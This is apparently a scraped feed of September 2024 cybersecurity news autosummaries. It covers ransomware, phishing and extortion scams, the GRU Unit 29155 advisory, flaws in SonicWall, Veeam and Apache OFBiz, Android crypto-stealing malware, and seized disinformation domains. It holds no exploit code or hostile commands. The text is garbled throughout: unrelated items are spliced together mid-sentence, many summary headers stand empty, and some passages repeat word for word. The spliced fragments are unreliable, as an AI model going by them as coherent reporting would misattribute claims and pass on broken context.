Examples of these attacks include full-scale tax fraud in China, where attackers fraudulently acquired $77 million by creating fake shell companies and sending invoices to victims the tax system recognized as clients, and unemployment claim fraud in California, in which attackers withdrew $3.4 million in falsified unemployment benefits by collecting real identities to create fake driver licenses, thus exploiting flaws in the system’s identity verification process.From there, cybersecurity solutions fall into four key categories: design, development, deployment, and operation. "The frequency of phishing attacks is rising as attackers increasingly utilize AI to execute more scams than ever before. In this Help Net Security video, Abhilash Garimella, Head Of Research at Bolster, discusses how phishing scams are now being hosted in the U.S. at nearly twice the rate compared to 2023, and this trend is only accelerating. Bolster’s researchers identified packages of voter data stolen over the past decade, available for sale on the dark … More
The post Phishing in focus: Disinformation, election and identity fraud appeared first on Help Net Security.
"Autosummary:
"Red Hat Enterprise Linux (RHEL) AI is Red Hat’s foundation model platform, enabling users to develop, test, and run GenAI models to power enterprise applications. The platform brings together the open source-licensed Granite LLM family and InstructLab model alignment tools based on the Large-scale Alignment for chatBots (LAB) methodology, packaged as an optimized, bootable RHEL image for individual server deployments across the hybrid cloud. While GenAI’s promise is immense, the associated costs of procuring, training, … More
The post Red Hat Enterprise Linux AI extends innovation across the hybrid cloud appeared first on Help Net Security.
"Autosummary:
While GenAI’s promise is immense, the associated costs of procuring, training, and fine-tuning LLMs can be astronomical, with some leading models costing nearly $200 million to train before launch. "Autosummary:
The malware "targets mnemonic keys by scanning for images on your device that might contain them," McAfee Labs researcher SangRyol Ryu said in an analysis, adding the targeting footprint has broadened in scope to include the U.K. The campaign makes use of bogus Android apps that are disguised as seemingly legitimate banking, government facilities, streaming, and utility apps in an attempt to trick users into installing them. "Autosummary:
The joint advisory, released last week as part of a coordinated exercise dubbed Operation Toy Soldier, comes from cybersecurity and intelligence authorities in the U.S., the Netherlands, the Czech Republic, Germany, Estonia, Latvia, Ukraine, Canada, Australia, and the U.K. Cadet Blizzard, also known as Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589, gained attention in January 2022 for deploying the destructive WhisperGate (aka PAYWIPE) malware against multiple Ukrainian victim organizations in advance of Russia"s full-blown military invasion of the country. "Autosummary:
Since April, the group used CLNTEND, a previously undetected remote access tool (RAT), which supports a wider range of network protocols for communication, further enhancing their capabilities. "Autosummary:
The attack starts with a shell script that downloads binaries for various architectures (ARM, MIPS, X86), extracts a command-and-control (C2) server from an encrypted configuration, and connects to it. "CVE-2024-40711, a critical vulnerability affecting Veeam Backup & Replication (VBR), could soon be exploited by attackers to steal enterprise data. Discovered and reported by Code WHite researcher Florian Hauser, the vulnerability can be leveraged for full system takeover, and security researchers from watchTowr Labs have already confirmed its potential for exploitation. Luckily for enterprises using VBR, both companies have refrained from sharing PoC exploit code or additional details about the flaw until most admins have … More
The post Veeam Backup & Replication RCE flaw may soon be leveraged by ransomware gangs (CVE-2024-40711) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
Mustang Panda, also known by the names BASIN, Bronze President, Camaro Dragon, Earth Preta, HoneyMyte, RedDelta, and Red Lich, has been operational since 2012, routinely conducting cyber espionage campaigns targeting government and religious entities across Europe and Asia, particularly those located in South China Sea countries. "Autosummary:
Security teams instantly get a real-time security "health" score, prioritized risks, contextualized threat insights, and the organization"s app inventory—without setups or integrations.Users get instant clarity on App2App connectivity, third-party risk management (TPRM), Gen-AI, compliance, and more. "Autosummary:
"Autosummary:
"Autosummary:
Federal agencies ordered to patch by September 30 CISA followed suit on Monday, adding the critical access control flaw to its Known Exploited Vulnerabilities catalog, ordering federal agencies to secure vulnerable SonicWall firewalls on their networks within three weeks by September 30, as mandated by Binding Operational Directive (BOD) 22-01. "Autosummary:
Overview of the spear-phishing infection chain Source: Trend Micro Trend Micro researchers say that Mustang Panda, which the company tracks as Earth Preta, has made significant strides in "malware deployment and strategies, particularly in their campaigns targeting government entities" (e.g. military, police, foreign affair agencies, welfare, the executive branch, and education in the APAC region). "Autosummary:
In a statement issued Monday, the district confirmed that all schools would remain closed, and all activities, including athletics and meetings, would be canceled on September 9. "Autosummary:
Apple said its new phones, which come with longer lasting batteries, more powerful chips and enhanced privacy features, were its first built specifically to handle AI and its new "Apple Intelligence" tools, many of which were announced in June. "Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Vulnerability allows Yubico security keys to be cloned Researchers have unearthed a cryptographic vulnerability in popular Yubico (FIDO) hardware security keys and modules that may allow attackers to clone the devices. September 2024 Patch Tuesday forecast: Downgrade is the new exploit Microsoft confirmed several reported issues throughout the month about the August updates. They added a comment to KB5041578 for … More
The post Week in review: Vulnerability allows Yubico security keys cloning, Patch Tuesday forecast appeared first on Help Net Security.
"Autosummary:
Infosec products of the month: August 2024 Here’s a look at the most interesting products from the past month, featuring releases from: Adaptive Shield, AppOmni, ArmorCode, Bitwarden, Cequence Security, ClearSale, Clutch Security, Contrast Security, Dragos, Elastic, Endor Labs, Entrust, Fortanix, Fortinet, Guardio, HYCU, Ivanti, McAfee, Nucleus Security, Own, Rapid7, Resecurity, Rezonate, RightCrowd, Stellar, Veza, Wallarm, and Wing Security. New infosec products of the week: September 6, 2024 Here’s a look at the most interesting products from the past week, featuring releases from Binarly, Bitdefender, Prompt Security, Revenera, Skyhigh Security, and Vanta. "Autosummary:
Venezuela"s opposition leader leaves country for Spain Reuters The Venezuelan government has said opposition presidential candidate Edmundo González has left the country, seeking asylum in Spain. "Autosummary:
"Autosummary:
"The actors may reference personal information, interests, affiliations, events, personal relationships, professional connections, or details a victim may believe are known to few others," the FBI said, highlighting attempts to build rapport and eventually deliver malware. "Autosummary:
Flashpoint, in a report published last month, said WWH-Club remains operational despite the law enforcement effort, and that "its other administrators are attempting to distance themselves from Kublitskii and Khodyrev." Khodyrev and Kublitskii "had been living in Miami for the past two years, while secretly continuing to administer WWH Club and its sister dark web marketplaces, forums, and schools," the DoJ said. "Autosummary:
We made a full backup of his disk (We have all his address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all his contacts) and are willing to give you full access to this data. Since then, scammers have created a wide variety of extortion email scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, and threats of installing ransomware. "Autosummary:
U.S. CISA adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog Pierluigi Paganini September 07, 2024 September 07, 2024 U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Draytek VigorConnect and Kingsoft WPS Office bugs to its Known Exploited Vulnerabilities catalog. "Autosummary:
"Autosummary:
We made a full backup of his disk (We have all his address book, social media, history of viewing sites, dating apps, all files, phone numbers, and addresses of all his contacts) and are willing to give you full access to this data. Since then, scammers have created a wide variety of extortion email scams, including ones that pretend to be hitman contracts, bomb threats, CIA investigations, and threats of installing ransomware. "Ransomware is an all-too-common occurrence: 83% of organizations have experienced at least one ransomware attack in the last year, 46% of respondents experienced four or more and 14% indicated they experienced 10 or more. Of those respondents who experienced at least one ransomware attack in the last year, 61% said it resulted in downtime of at least 24 hours, according to Onapsis. Source: Onapsis Of those organizations that experienced ransomware attacks, 89% said their Enterprise … More
The post 83% of organizations experienced at least one ransomware attack in the last year appeared first on Help Net Security.
"Autosummary:
"I asked for a calm August 2024 Patch Tuesday in last month’s forecast article and that came to pass. The updates released were limited to the regular operating systems and all forms of Office applications. Six zero-day vulnerabilities were announced, with five in the operating systems and one in the Office applications. There were 63 CVEs addressed in the Windows 10 operating systems and associated servers and 55 CVEs addressed in Windows 11. Overall, it … More
The post September 2024 Patch Tuesday forecast: Downgrade is the new exploit appeared first on Help Net Security.
"Autosummary:
September 2024 Patch Tuesday forecast Microsoft will release the standard operating system, Office, Sharepoint, and perhaps a .NET framework or SQL update this month.Overall, it was a straightforward set of updates to deploy, but several issues were identified over the past month, which Microsoft has acknowledged and is working on. "For the fourth time in the last five months, Apache OFBiz users have been advised to upgrade their installations to fix a critical flaw (CVE-2024-45195) that could lead to unauthenticated remote code execution. About CVE-2024-45195 Apache OFBiz is an open-source suite for enterprise resource planning (ERP), which contains web applications for human resources management, customer relationship management, accounting, marketing, etc. “Apache OFBiz is used by numerous large organizations, and previously disclosed vulnerabilities for it have … More
The post Apache OFBiz team patches critical RCE vulnerability (CVE-2024-45195) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
As can be seen in Figure 5, MSPs and MSSPs have identified the main benefits of a vCISO platform as standardizing work processes (36%), accelerating onboarding of their new employees (34%), easy access to compliance frameworks (33%), and increased revenue (33%) and easy upselling (32%). Just as importantly, 43% of MSPs and MSSPs identified improved customer security as a beneficial impact of adding vCISO services, 38% enjoyed increased client engagement, and 38% were able to upsell additional products and services.The report reveals a startling trend: a significant majority (98%) feel overwhelmed by the complexities of security and compliance frameworks like NIST, ISO, PCI-DSS, GDPR, and more.Obstacles to Offering vCISO Services and How to Address Them Yet, the path to vCISO success requires addressing certain challenges, as can be seen in Figure 4. 29% of respondents report that they lack the technology that can help them support and offer vCISO services. "Autosummary:
Timeline of the SpyAgent campaign Source: McAfee In July 2023, Trend Micro revealed two Android malware families named CherryBlos and FakeTrade, spread via Google Play, that also used OCR to steal cryptocurrency data from extracted images, so this tactic appears to be gaining traction. "Autosummary:
SonicWall Gen 5 running SonicOS version 5.9.2.14-12o and older – fixed in SonicOS version 5.9.2.14-13o SonicWall Gen 6 running SonicOS version 6.5.4.14-109n and older – fixed in 6.5.2.8-2n (for SM9800, NSsp 12400, NSsp 12800) and version 6.5.4.15-116n (for other Gen 6 Firewalls) SonicWall Gen 7 running SonicOS version 7.0.1-5035 and older – not reproducible in 7.0.1-5035 and later. "The US Department of Justice has named five Russian computer hackers as members of Unit 29155 – i.e., the 161st Specialist Training Center of the Russian General Staff Main Intelligence Directorate (GRU) – which they deem resposible for the 2022 WhisperGate wiper malware attacks on Ukrainian government organizations and critical infrastructure, and subsequently computer network operations against NATO member and ally countries. “Since early 2022, the primary focus of the cyber actors appears to be … More
The post Exposed: Russian military Unit 29155 does digital sabotage, espionage appeared first on Help Net Security.
"Autosummary:
Active Directory (AD) enumeration (Impacket, ldapdomaindump, BloodHound) Vulnerability scanning (Acunetix, Amass, Droopescan, eScan, and JoomScan) They use CVE exploit scripts from GitHub repositories to target vulnerable IoT and networking devices, as well as computers and web servers, and virtual private servers to host their tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. "Autosummary:
"Autosummary:
"Many of our staff have limited access to systems and email and, as a result, we may be delayed or unable to respond to your query or any webforms previously submitted," TfL said in a Friday update. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Car rental company Avis discloses a data breach Pierluigi Paganini September 06, 2024 September 06, 2024 Car rental giant Avis disclosed a data breach that impacted one of its business applications in August compromising customers’ personal information. "Autosummary:
Below is the list of impacted platforms: Impacted Platforms Impacted Versions SOHO (Gen 5) 5.9.2.14-12o and older versions Gen6 Firewalls -SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650,NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250,SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W 6.5.4.14-109n and older versions Gen7 Firewalls – TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W,TZ570P, TZ670, NSa 2700, NSa 3700,NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700 SonicOS build version 7.0.1-5035 and older versions.SonicWall warns that SonicOS bug exploited in attacks Pierluigi Paganini September 06, 2024 September 06, 2024 Recently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. "Autosummary:
According to data breach notification letters sent to impacted customers on Wednesday and filed with California"s Office of the Attorney General, the company took action to stop the unauthorized access, launched an investigation with the help of external cybersecurity experts, and reported the incident to relevant authorities after learning of the breach on August 5. "Organizations’ preparedness and resilience against threats isn’t keeping pace with cybercriminals’ advancements. Some CEOs still believe that cybersecurity requires episodic intervention rather than ongoing attention. That isn’t the reality for many companies; cyber threat preparedness requires a concerted training effort, so cybersecurity teams are ready when an attack occurs. Cybersecurity practitioners often share curiosity as a key personality trait, and many enjoy hands-on learning approaches. This naturally makes gamified experiences like competitions and capture-the-flags a … More
The post How to gamify cybersecurity preparedness appeared first on Help Net Security.
"Autosummary:
Gamified training unearths unexpected skills Technical acumen on cybersecurity teams is table stakes – gamified training helps uncover and develop the soft skills needed to successfully thwart or remediate a threat, such as empathy, delegation, and time management. Understanding company priorities, initiatives, and risks With the cost of a data breach nearing $4.5 million, organizations can’t afford to have teams at odds during an emergency, when every minute counts. "Autosummary:
Planned Parenthood listed on RansomHub"s extortion site Source: BleepingComputer Last week, the FBI, CISA, the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) issued a joint advisory about RansomHub"s trend of targeting healthcare organizations, of which this is another example. "Binarly announced Binarly Transparency Platform 2.5 with several features designed to enhance software vulnerability management and improve security posture across enterprise environments. The key highlight of this release is the innovative Reachability Analysis, a feature that identifies and prioritizes vulnerabilities based on their exploitability within the system’s execution flow, allowing for more targeted and effective remediation. With the introduction of Reachability Analysis, Binarly’s Transparency Platform 2.5 provides a truly innovative method to evaluate risk by … More
The post Binarly Transparency Platform 2.5 identifies critical vulnerabilities before they can be exploited appeared first on Help Net Security.
"Autosummary:
Building on the powerful capabilities of the Binary Risk Intelligence Core introduced earlier this year, Binarly Transparency Platform 2.5 introduces several enhancements designed to provide comprehensive visibility and control over firmware security: Custom semantic detection rules : Allows product security teams to create rules for detecting vulnerabilities discovered internally, even before they are assigned a CVE, enabling proactive hunting for broader security risks. "The automotive industry is facing many of the same cybersecurity risks and threats that successful organizations in other sectors are up against, but it’s also battling some distinct ones. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the … More
The post The future of automotive cybersecurity: Treating vehicles as endpoints appeared first on Help Net Security.
"Autosummary:
Advanced persistent threat groups, such as APT4, APT6 and APT37, are notorious for their focus on intellectual property theft, especially in industries where proprietary technology and competitive advantage are critical. Given the proprietary nature and immense competitive value of automotive technology, these firms must be particularly vigilant against espionage attempts, as the consequences of a successful attack could be devastating both financially and reputationally, potentially leading to lost market share and long-term erosion of trust. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the future of automotive cybersecurity. Every technology, no matter how advanced, comes with its own set of weaknesses, and automotive technology is no exception. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Malicious GitHub repository Source: Veriti Specifically, the GitHub repository contains executables that resemble checkers for Disney+ accounts, Instagram, and a supposed Mirai botnet builder: Disney+ account thieves are targeted with "DisneyChecker.exe" Instagram hackers are lured by "InstaCheck.exe" Wannabe botnet creators are lured with "ccMirai.exe" Digging deeper into the malware"s communications, Veriti"s researchers found a set of ".shop" domains that acted as command and control (C2) servers, sending commands to Lumma and receiving the exfiltrated data. "Autosummary:
It"s a comprehensive collection of guidelines, best practices, and recommendations, divided into five core functions: Identify, Protect, Detect, Respond, and Recover.To make this happen, CTEM programs integrate advanced tech like exposure assessment, security validation, automated security validation, attack surface management, and risk prioritization. 2.0 brings with it some changes; among other advancements, it adds in "Govern" as a first step, because, according to ISC.2.org, "the CSF"s governance component emphasizes that cybersecurity is a major source of enterprise risk that senior leaders must consider alongside others such as finance and reputation. "Autosummary:
The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "Autosummary:
"Autosummary:
Malicious GitHub repository Source: Veriti Specifically, the GitHub repository contains executables that resemble checkers for Disney+ accounts, Instagram, and a supposed Mirai botnet builder: Disney+ account thieves are targeted with "DisneyChecker.exe" Instagram hackers are lured by "InstaCheck.exe" Wannabe botnet creators are lured with "ccMirai.exe" Digging deeper into the malware"s communications, Veriti"s researchers found a set of ".shop" domains that acted as command and control (C2) servers, sending commands to Lumma and receiving the exfiltrated data. "Autosummary:
As laid out in a recent joint advisory by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS), RansomHub is a relatively new but very active Ransomware-as-a-Service group known to target healthcare organizations and other critical infrastructure sectors. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
While there"s no definitive proof, the similarities between Cicada and BlackCat, including the use of Rusy, evasion techniques, and timing, suggest a possible connection. According to a blog post by security researchers at Morphisec, at least 21 companies, predominantly in North America and the UK, have been hit by Cicada since June 18, 2024. "Autosummary:
The complete list of domains, which mimic legitimate news outlets like Der Spiegel, Fox News, Le Monde, and The Washington Post, is as follows - tribunalukraine.info rrn.media ukrlm.info faz.ltd spiegel.agency lemonde.ltd leparisien.ltd rbk.media 50statesoflie.media meisterurian.io artichoc.io vip-news.org acrosstheline.press mypride.press truthgate.us warfareinsider.us shadowwatch.us pravda-ua.com waronfakes.com holylandherald.com levinaigre.net grenzezank.com lexomnium.com uschina.online honeymoney.press sueddeutsche.co tagesspiegel.co bild.work fox-news.top fox-news.in forward.pw, and washingtonpost.pm Concurrent with the domain seizures, the Treasury Department sanctioned 10 individuals and two entities for engaging in efforts to influence and undermine confidence in the electoral process. "Autosummary:
It supports commands for downloading/uploading files, exploring the file system, launching an interactive shell, executing shellcode, and conducting various scans (e.g., TCP, RDP, TLS, Ping, Web). "Autosummary:
GRU Unit 29155 junior officers (U.S. State Department) Today, the U.S. State Department also announced a reward of up to $10 million through its Rewards for Justice program for information on Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin, five of the Russian military intelligence officers believed to be part of GRU"s Unit 29155. "Autosummary:
The plugin"s vendor, LiteSpeed Technologies, addressed the problem by moving the debug log to a dedicated folder ("/wp-content/litespeed/debug/"), randomizing log filenames, removing the option to log cookies, and adding a dummy index file for extra protection. "Autosummary:
"Autosummary:
"Cyber Systems Operations United States Air Force | USA | On-site – View job details The United States Air Force is looking for a Cyber Systems Operations Specialist to design, install, and support systems to ensure they operate properly and remain secure from outside intrusion. Cloud Security Service Manager SAP Fioneer | Germany | Remote – View job details You will be responsible for driving continuous improvement of security standards and system hardening, supporting audits … More
The post Cybersecurity jobs available right now: September 4, 2024 appeared first on Help Net Security.
"Autosummary:
Cyber Security Analyst Suncare Community Services | Australia | On-site – View job details In the role of Cyber Security Analyst within the ICT team, you will play a role in safeguarding our ICT infrastructure and data by implementing and maintaining robust security practices, controlling access to ICT systems, supporting the ISMS, and conducting regular audits to identify and mitigate potential risks. "Ransomware remains a concerning cybersecurity threat, with attacks becoming more frequent, severe, and costly. Recent reports highlight alarming trends, including increased attacks on critical sectors like healthcare, education, and manufacturing. The US, leading in global ransomware incidents, faces an exceptionally high risk, especially in education and healthcare. Organizations are frequently hit multiple times, and ransom payments, while common, often fail to prevent further disruption. Most ransomware attacks occur between 1 a.m. and 5 a.m. Malwarebytes … More
The post Ransomware attacks escalate as critical sectors struggle to keep up appeared first on Help Net Security.
"Autosummary:
Zscaler | Zscaler ThreatLabz 2024 Ransomware Report | August 2024 The findings from the report uncovered a record-breaking ransom payment of $75 million to the Dark Angels ransomware group, which is nearly double the highest publicly known ransomware payout, and an overall 18% increase in ransomware attacks year-over-year. "With cyber threats becoming increasingly sophisticated and targeting critical infrastructure, in this Help Net Security interview, David Ferbrache, managing director of Beyond Blue, discusses the current state of cybersecurity readiness and resilience. Ferbrache talks about the complexities of managing both traditional and digital infrastructures, the critical role of regulatory bodies, the urgent need for public and private sector collaboration to counteract these threats, and much more. With the increasing sophistication of cyber threats targeting national … More
The post Protecting national interests: Balancing cybersecurity and operational realities appeared first on Help Net Security.
"Autosummary:
While we still depend on traditional national infrastructure providers like water, oil, gas, and electricity, we increasingly rely on the digital ecosystem.With cyber threats becoming increasingly sophisticated and targeting critical infrastructure, in this Help Net Security interview, David Ferbrache, managing director of Beyond Blue, discusses the current state of cybersecurity readiness and resilience. Cybersecurity is one of the most evolving aspects of national security, with a changing threat landscape, new attack tactics, and an increasingly complex and interdependent critical national infrastructure. "Autosummary:
"The combination of spoofed, compromised and legitimate infrastructure leveraged by WikiLoader campaigns reinforces the malware authors attention to building an operationally secure and robust loader, with multiple [command-and-control] configurations," the researchers said. "Researchers have unearthed a cryptographic vulnerability in popular Yubico (FIDO) hardware security keys and modules that may allow attackers to clone the devices. But the news is not as catastrophic as it may seem at first glance. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM [hardware security module], knowledge of the accounts they want to target, and specialized equipment to perform the necessary attack. Depending on the use case, the … More
The post Vulnerability allows Yubico security keys to be cloned appeared first on Help Net Security.
"Autosummary:
Yubico delivers fix, but… Yubico has evaluated its products and found that the vulnerability affects: YubiKey 5 Series, YubiKey 5 FIPS Series, and YubiKey 5 CSPN Series devices with firmware prior to 5.7 YubiKey Bio Series devices with firmware prior to 5.7.2 Security Key Series all versions with firmware prior to 5.7 YubiHSM 2 and YubiHSM 2 FIPS moduls with firmware prior to 2.4.0 “The (…) vulnerability primarily impacts FIDO use cases because the FIDO standard relies on the affected functionality by default. "Autosummary:
With the US election campaigns at full throttle, scammers have taken a renewed interest in the ways this can be used to defraud people , often using the same tactics legitimate campaigns leverage for support (emails, text messages, phone calls, and social media pleas). Donate safely If you decide to sponsor a candidate, do not follow any links provided in text messages, emails, or on social media. A survey site that asks for personal details and credit card information Another method besides surveys are voter registration scams where the scammer poses as an election official and asks you to update your voter registration, or tell you that you can register to vote over the phone. "Autosummary:
"Autosummary:
"Autosummary:
Though Pegasus is indeed a powerfully invasive spyware tool, the threat of its use, as included in these scam emails, is entirely empty.It provides access to your webcam, messengers, emails, call records, etc. How to react to “Hello pervert” emails First and foremost, never reply to emails of this kind. "Autosummary:
Microchip Technology entry on Play ransomware"s leak site (BleepingComputer) They claimed to have stolen a wide range of information from Microchip Technology"s compromised systems, including "private and personal confidential data, clients documents, budget, payroll, accounting, contracts, taxes, IDs, finance information," and more. "Autosummary:
" The complete list of domains used by Doppelgänger for spreading disinformation that the FBI has seized includes: ribunalukraine.info, rrn.media, ukrlm.info, faz.ltd, spiegel.agency, lemonde.ltd, leparisien.ltd, rbk.media, 50statesoflie.media, meisterurian.io, artichoc.io, vip-news.org, acrosstheline.press, mypride.press, truthgate.us, warfareinsider.us, shadowwatch.us, pravda-ua.com, waronfakes.com, holylandherald.com, levinaigre.net, grenzezank.com, lexomnium.com, uschina.online, honeymoney.press, sueddeutsche.co, tagesspiegel.co, bild.work, fox-news.top, fox-news.in, forward.pw, and washingtonpost.pm. "Autosummary:
The maintainers of GrapheneOS, an Android-based, open source, privacy and security-focused mobile operating system, explained that CVE-2024-32896 results from the partial mitigation of another flaw tracked as CVE-2024-29748. "The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.
To mitigate this malicious cyber activity, organizations should take the following actions today:
This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.
FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:
Autosummary:
Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs: CVE-2020-1472 (Microsoft: Windows Server) CVE-2021-26084 (Atlassian Confluence Server and Data Center) CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing) CVE-2021-4034 (Red Hat: Polkit Privilege Escalation) CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw) Estonian Internal Security Service (KAPO) Latvian State Security Service (VDD) Security Service of Ukraine (SBU) Computer Emergency Response Team of Ukraine (CERT-UA) Canadian Security Intelligence Service (CSIS) Communications Security Establishment Canada (CSE) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) United Kingdom National Cyber Security Centre (NCSC-UK) For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage. Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6] Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6] Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites "While SaaS security is finally getting the attention it deserves, there’s still a significant gap between intent and implementation. Ad hoc strategies and other practices still fall short of a security program. The move toward decentralization has generated confusion over responsibilities, and many organizations remain unaware of which SaaS applications are used, by whom, and what is risky, according to AppOmni. Source: AppOmni “Despite greater awareness and effort, things are getting worse. Just as there … More
The post A third of organizations suffered a SaaS data breach this year appeared first on Help Net Security.
"Autosummary:
When organizations implement SaaS apps, they see a surge in third-party integrations that deliver extended functionalities, automated workflows, unified data access, etc. "In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem. West talks about the implications of these changes for targeted industries, particularly engineering and manufacturing, and examines ransomware actors’ growing reliance on dual-use tools. How has the ransomware-as-a-service (RaaS) landscape evolved? Are we seeing a shift in … More
The post How ransomware tactics are shifting, and what it means for your business appeared first on Help Net Security.
"Autosummary:
The tools we found to be commonly used by RaaS actors included PDQ Connect, Action1, AnyDesk, and TeamViewer for remote access, as well as rclone, rsync, Megaupload, and FileZilla for data exfiltration.In this Help Net Security interview, Tim West, Director of Threat Intelligence and Outreach at WithSecure, discusses Ransomware-as-a-Service (RaaS) with a focus on how these cybercriminal operations are adapting to increased competition, shifting structures, and a fragmented ecosystem.At the same time, from a defender’s perspective, the mistrust among cybercriminals is beneficial, as it likely makes them less effective, less efficient, and easier to defend against. Proprietary data and intellectual property (IP), including designs, blueprints, and trade secrets are critical to maintaining a competitive edge, and therefore lucrative assets for theft or sale. At the same time, traditional defences against ransomware encryption, such as backup strategies and network segmentation, remain important. "Autosummary:
" Some of the prominent targets of the malware include financial institutions such as Itaú Shop, Santander, with the phony apps masquerading as Bradesco Prime and Correios Celular, among others - Livelo Pontos (com.resgatelivelo.cash) Correios Recarga (com.correiosrecarga.android) Bratesco Prine (com.resgatelivelo.cash) Módulo de Segurança (com.viberotion1414.app) Source code analysis of the malware has revealed that Rocinante is being internally called by the operators as Pegasus (or PegasusSpy). "Autosummary:
"Autosummary:
When that didn’t render any results, Rhysida published (please note the word “published” here, it’s important) stolen data comprising 260,000 files (3.1 TB) which was almost half of what they claimed to have, on August 8, 2024. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. So, the City of Columbus decided to sue Goodwolf for alleged damages for criminal acts, invasion of privacy, negligence, and civil conversion. "Ping Identity announced the addition of key identity capabilities to its FedRAMP High & DoD IL5 offerings. With Ping Government Identity Cloud, federal agencies and government suppliers now have access to capabilities that enable them to boost compliance, security and experiences through modernizing identity, credential and access management. Following FedRAMP High certification, DOD Impact Level 5 (IL5) authorization, and joining with ForgeRock, Ping Government Identity Cloud now offers authorized identity capabilities for multi-factor authentication (MFA), … More
The post Ping Identity strengthens security for federal agencies and government suppliers appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Another crucial component of its attack arsenal is Sliver, an open-source C2 framework, and a collection of various publicly available tools such as rsockstun, ngrok, and Mimikatz that facilitate discovery, lateral movement, and credential harvesting. "Autosummary:
"Autosummary:
“The Company remains subject to various risks due to the incident, including the adequacy of processes during the period of disruption, diversion of management’s attention, potential litigation, changes in customer behavior, and regulatory scrutiny.” continues the document. "Autosummary:
The contactless website is used to purchase online tickets, upgrade travelcards (Oystercards), check travel history, and request refunds. "Autosummary:
Additionally, never withdraw cash in response to unexpected calls or messages, and never believe anyone who says you need to use a Bitcoin ATM, buy gift cards, or move money to protect your bank account or fix a problem. "Autosummary:
"During the second quarter, new ransomware groups, including PLAY, Medusa, RansomHub, INC Ransom, BlackSuit, and some additional lesser-known factions, led a series of attacks that eclipsed the first quarter of this year by 16% and the second quarter of 2023 by 8%, according to Corvus Insurance. These new threat actors emerged following the international law enforcement’s takedown of LockBit and BlackCat. Ransomware: Most frequently targeted industries (Source: Corvus Insurance) Ransomware demands and payouts Based on … More
The post Ransomware crisis deepens as attacks and payouts rise appeared first on Help Net Security.
"Autosummary:
